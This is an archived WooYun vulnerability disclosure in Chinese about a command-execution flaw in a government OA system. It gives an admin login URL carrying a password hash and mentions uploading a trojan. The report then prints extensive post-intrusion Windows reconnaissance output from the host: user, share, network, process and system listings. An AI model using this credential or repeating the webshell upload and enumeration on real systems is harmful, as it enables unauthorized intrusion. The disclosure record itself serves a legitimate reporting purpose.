乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向核心白帽子及相关领域专家公开 2015-12-13: 细节向普通白帽子公开 2015-12-23: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
系统地址**.**.**.**:8080/FYOA/login.action?user.account=admin&user.password=e10adc3949ba59abbe56e057f20f883e&randomnum=892448存在命令执行漏洞
直接上传木马到服务器
[*] 磁盘列表 [ A:C:D:E: ]D:\tomcatCPPCCOA\webapps\FYOA\FYOA\> net user\\ZXB02 的用户帐户-------------------------------------------------------------------------------Administrator Guest SUPPORT_388945a0 test tomcat 命令成功完成。系统找不到指定的路径。D:\tomcatCPPCCOA\bin\> net share共享名 资源 注释-------------------------------------------------------------------------------D$ D:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\WINDOWS 远程管理 C$ C:\ 默认共享 databak D:\备份\83的数据库bak 命令成功完成。D:\tomcatCPPCCOA\bin\> net view服务器名称 注释-------------------------------------------------------------------------------\\ABC-D17F90F2F08 \\BBB-446B684C2E5 \\CC-82BC9A9C6BAE \\CMS \\DAJ-BF640575F9D \\EVA8400 \\FY-33C34755F800 \\FYHRSERVER \\FYJW01-3C81BCA3 \\FYJW02-B610BDDC \\FYWSJ3 \\JXJ-DDF6C727636 \\MS-A83F60A02DA7 \\MS-A83F60A149 \\PACS02 \\VMW2K3X32-129 \\VMW2K3X32_JGSWJ \\VMW2K3X64-1 \\W2K3X32-DANG01 \\W2K3X32-MZ0101 \\W2K3X32-MZ0201 \\W2K3X32-TZGL01 \\W2K3X32-TZJC01 \\W2K3X32-WANGZ01 \\W2K3X32-ZJJ0101 \\W2K3X32-ZXB03 \\W2K3X64WSJ0301 \\W2K3X64WSJ0401 \\WIN-8T95QSCT0AD \\WIN-SNC115140 \\WIN-SNC115144 \\WIN-SNC1153201 \\WIN-SNC1153BI14 \\WIN-SNC115AB154 \\WIN-X2UK7HNWF3E \\WSJXDT-676B8186 \\WSJYY-18A715904 \\WSJYY02 \\WSJYY03 \\WSJYY08 \\ZXB01 \\ZXB02 命令成功完成。D:\tomcatCPPCCOA\bin\> netstat -anoActive Connections Proto Local Address Foreign Address State PID TCP **.**.**.**:80 **.**.**.**:0 LISTENING 2328 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 724 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 460 TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 2172 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2648 TCP **.**.**.**:4310 **.**.**.**:0 LISTENING 1692 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 2328 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 452 TCP **.**.**.**:8081 **.**.**.**:0 LISTENING 2056 TCP **.**.**.**:8099 **.**.**.**:0 LISTENING 452 TCP **.**.**.**:135 **.**.**.**:53584 TIME_WAIT 0 TCP **.**.**.**:135 **.**.**.**:53631 TIME_WAIT 0 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1270 **.**.**.**:1521 ESTABLISHED 452 TCP **.**.**.**:2770 **.**.**.**:1521 ESTABLISHED 452 TCP **.**.**.**:3389 **.**.**.**:59244 ESTABLISHED 2648 TCP **.**.**.**:4184 **.**.**.**:1521 ESTABLISHED 452 TCP **.**.**.**:4676 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:6266 ESTABLISHED 452 TCP **.**.**.**:1026 **.**.**.**:4310 ESTABLISHED 1408 TCP **.**.**.**:1036 **.**.**.**:0 LISTENING 2912 TCP **.**.**.**:4310 **.**.**.**:1026 ESTABLISHED 1692 TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 2328 TCP **.**.**.**:8095 **.**.**.**:0 LISTENING 452 UDP **.**.**.**:445 *:* 4 UDP **.**.**.**:3529 *:* 74940 UDP **.**.**.**:3540 *:* 74940 UDP **.**.**.**:3600 *:* 1484 UDP **.**.**.**:8082 *:* 2056 UDP **.**.**.**:123 *:* 864 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 864 UDP **.**.**.**:1038 *:* 864 UDP **.**.**.**:1079 *:* 1484D:\tomcatCPPCCOA\bin\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 328 暂缺 csrss.exe 376 暂缺 winlogon.exe 400 暂缺 services.exe 448 Eventlog, PlugPlay lsass.exe 460 ProtectedStorage, SamSs vmacthlp.exe 624 VMware Physical Disk Helper Service svchost.exe 668 DcomLaunch svchost.exe 724 RpcSs RsMgrSvc.exe 768 RsMgrSvc svchost.exe 828 Dnscache svchost.exe 864 LmHosts, W32Time svchost.exe 880 AeLookupSvc, AudioSrv, Browser, CryptSvc, dmserver, EventSystem, lanmanserver, lanmanworkstation, Netman, Nla, RasMan, Schedule, SENS, SharedAccess, ShellHWDetection, winmgmt, wuauserv, WZCSVC ZhuDongFangYu.exe 908 ZhuDongFangYu conime.exe 1272 暂缺 explorer.exe 1292 暂缺 UdaterUI.exe 1400 暂缺 ClientTray.exe 1408 暂缺 VMwareTray.exe 1448 暂缺 VMwareUser.exe 1460 暂缺 360Tray.exe 1484 暂缺 popwndexe.exe 1492 暂缺 ctfmon.exe 1512 暂缺 360sd.exe 1524 暂缺 McTray.exe 1172 暂缺 spoolsv.exe 1440 Spooler ClientService.exe 1692 BackupSystemClientService FrameworkService.exe 2056 McAfeeFramework mysqld-nt.exe 2172 MySQL VMwareService.exe 2220 VMTools svchost.exe 2648 TermService wmiprvse.exe 2688 暂缺 alg.exe 2912 ALG dllhost.exe 3000 COMSysApp msdtc.exe 3200 MSDTC svchost.exe 3744 TapiSrv csrss.exe 1932 暂缺 winlogon.exe 228 暂缺 rdpclip.exe 984 暂缺 java.exe 2328 暂缺 logon.scr 4868 暂缺 java.exe 452 暂缺 360rp.exe 74940 暂缺 naPrdMgr.exe 17716 暂缺 csrss.exe 95096 暂缺 winlogon.exe 62524 暂缺 cmd.exe 5216 暂缺 tasklist.exe 46228 暂缺 wmiprvse.exe 2588 暂缺 D:\tomcatCPPCCOA\bin\> net start已经启动以下 Windows 服务: Application Experience Lookup Service Application Layer Gateway Service Automatic Updates Backup System Client Service COM+ Event System COM+ System Application Computer Browser Cryptographic Services DCOM Server Process Launcher Distributed Transaction Coordinator DNS Client Event Log Logical Disk Manager McAfee Framework 服务 MySQL Network Connections Network Location Awareness (NLA) Plug and Play Print Spooler Protected Storage Remote Access Connection Manager Remote Procedure Call (RPC) Rsd Service Security Accounts Manager Server Shell Hardware Detection System Event Notification Task Scheduler TCP/IP NetBIOS Helper Telephony Terminal Services VMware Tools 服务 VMware 物理磁盘助手服务 Windows Audio Windows Firewall/Internet Connection Sharing (ICS) Windows Management Instrumentation Windows Time Wireless Configuration Workstation 主动防御命令成功完成。D:\tomcatCPPCCOA\bin\> ipconfig /allWindows IP Configuration Host Name . . . . . . . . . . . . : ZXB02 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter 本地连接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-50-56-98-59-31 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : **.**.**.** DNS Servers . . . . . . . . . . . : **.**.**.**D:\tomcatCPPCCOA\bin\> systeminfo主机名: ZXB02OS 名称: Microsoft(R) Windows(R) Server 2003, Standard EditionOS 版本: 5.2.3790 Service Pack 2 Build 3790OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: abc注册的组织: gov产品 ID: 69819-650-9188916-45071初始安装日期: 2011-12-18, 23:09:13系统启动时间: 暂缺系统制造商: VMware, Inc.系统型号: VMware Virtual Platform系统类型: X86-based PC处理器: 安装了 4 个处理器。 [01]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2534 Mhz [02]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2534 Mhz [03]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2534 Mhz [04]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2534 MhzBIOS 版本: INTEL - 6040000Windows 目录: C:\WINDOWS系统目录: C:\WINDOWS\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 4,095 MB可用的物理内存: 3,316 MB页面文件: 最大值: 5,972 MB页面文件: 可用: 4,133 MB页面文件: 使用中: 1,839 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\ZXB02修补程序: 安装了 247 个修补程序。 [01]: File 1 [02]: File 1 [03]: File 1 [04]: File 1 [05]: File 1 [06]: File 1 [07]: File 1 [08]: File 1 [09]: File 1 [10]: File 1 [11]: File 1 [12]: File 1 [13]: File 1 [14]: File 1 [15]: File 1 [16]: File 1 [17]: File 1 [18]: File 1 [19]: File 1 [20]: File 1 [21]: File 1 [22]: File 1 [23]: File 1 [24]: File 1 [25]: File 1 [26]: File 1 [27]: File 1 [28]: File 1 [29]: File 1 [30]: File 1 [31]: File 1 [32]: File 1 [33]: File 1 [34]: File 1 [35]: File 1 [36]: File 1 [37]: File 1 [38]: File 1 [39]: File 1 [40]: File 1 [41]: File 1 [42]: File 1 [43]: File 1 [44]: File 1 [45]: File 1 [46]: File 1 [47]: File 1 [48]: File 1 [49]: File 1 [50]: File 1 [51]: File 1 [52]: File 1 [53]: File 1 [54]: File 1 [55]: File 1 [56]: File 1 [57]: File 1 [58]: File 1 [59]: File 1 [60]: File 1 [61]: File 1 [62]: File 1 [63]: File 1 [64]: File 1 [65]: File 1 [66]: File 1 [67]: File 1 [68]: File 1 [69]: File 1 [70]: File 1 [71]: File 1 [72]: File 1 [73]: File 1 [74]: File 1 [75]: File 1 [76]: File 1 [77]: File 1 [78]: File 1 [79]: File 1 [80]: File 1 [81]: File 1 [82]: File 1 [83]: File 1 [84]: File 1 [85]: File 1 [86]: File 1 [87]: File 1 [88]: File 1 [89]: File 1 [90]: File 1 [91]: File 1 [92]: File 1 [93]: File 1 [94]: File 1 [95]: File 1 [96]: File 1 [97]: File 1 [98]: File 1 [99]: File 1 [100]: File 1 [101]: File 1 [102]: File 1 [103]: File 1 [104]: File 1 [105]: File 1 [106]: File 1 [107]: File 1 [108]: File 1 [109]: File 1 [110]: File 1 [111]: File 1 [112]: File 1 [113]: File 1 [114]: File 1 [115]: File 1 [116]: File 1 [117]: File 1 [118]: File 1 [119]: File 1 [120]: Q147222 [121]: KB2604078 - QFE [122]: KB2656358 - QFE [123]: KB2656376 - QFE [124]: KB2656376-v2 - QFE [125]: KB933854 - QFE [126]: KB979907 - QFE [127]: KB975558_WM8 [128]: KB925398_WMP64 [129]: KB2564958 - Update [130]: KB2079403 - Update [131]: KB2115168 - Update [132]: KB2229593 - Update [133]: KB2296011 - Update [134]: KB2347290 - Update [135]: KB2360937 - Update [136]: KB2378111 - Update [137]: KB2387149 - Update [138]: KB2419635 - Update [139]: KB2423089 - Update [140]: KB2440591 - Update [141]: KB2443105 - Update [142]: KB2476490 - Update [143]: KB2478960 - Update [144]: KB2478971 - Update [145]: KB2483185 - Update [146]: KB2485663 - Update [147]: KB2506212 - Update [148]: KB2507618 - Update [149]: KB2507938 - Update [150]: KB2508429 - Update [151]: KB2509553 - Update [152]: KB2510587 - Update [153]: KB2524375 - Update [154]: KB2535512 - Update [155]: KB2536276-v2 - Update [156]: KB2544521 - Update [157]: KB2544893-v2 - Update [158]: KB2562937 - Update [159]: KB2566454 - Update [160]: KB2570947 - Update [161]: KB2584146 - Update [162]: KB2585542 - Update [163]: KB2598479 - Update [164]: KB2603381 - Update [165]: KB2604078 - Update [166]: KB2618451 - Update [167]: KB2620712 - Update [168]: KB2621440 - Update [169]: KB2624667 - Update [170]: KB2631813 - Update [171]: KB2638806 - Update [172]: KB2641690-v2 - Update [173]: KB2644615 - Update [174]: KB2646524 - Update [175]: KB2647518 - Update [176]: KB2653956 - Update [177]: KB2655992 - Update [178]: KB2656358 - Update [179]: KB2656376 - Update [180]: KB2656376-v2 - Update [181]: KB2659262 - Update [182]: KB2675157 - Update [183]: KB2685939 - Update [184]: KB2691442 - Update [185]: KB2695962 - Update [186]: KB2698365 - Update [187]: KB2699988 - Update [188]: KB2707511 - Update [189]: KB2709162 - Update [190]: KB2718704 - Update [191]: KB2719985 - Update [192]: KB2731847 - Update [193]: KB923561 - Update [194]: KB924667-v2 - Update [195]: KB927891 - Update [196]: KB929123 - Update [197]: KB932716-v2 - Update [198]: KB933854 - Update [199]: KB944653 - Update [200]: KB946026 - Update [201]: KB948496 - Update [202]: KB950224-v3 - Update [203]: KB950762 - Update [204]: KB950974 - Update [205]: KB951748 - Update [206]: KB952004 - Update [207]: KB952954 - Update [208]: KB954155 - Update [209]: KB956802 - Update [210]: KB956844 - Update [211]: KB958644 - Update [212]: KB959426 - Update [213]: KB960803 - Update [214]: KB960859 - Update [215]: KB961501 - Update [216]: KB967715 - Update [217]: KB968389 - Update [218]: 网卡: 安装了 1 个 NIC。 [01]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.**D:\tomcatCPPCCOA\bin\>
加强安全意识
危害等级:高
漏洞Rank:13
确认时间:2015-11-23 10:24
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置
暂无
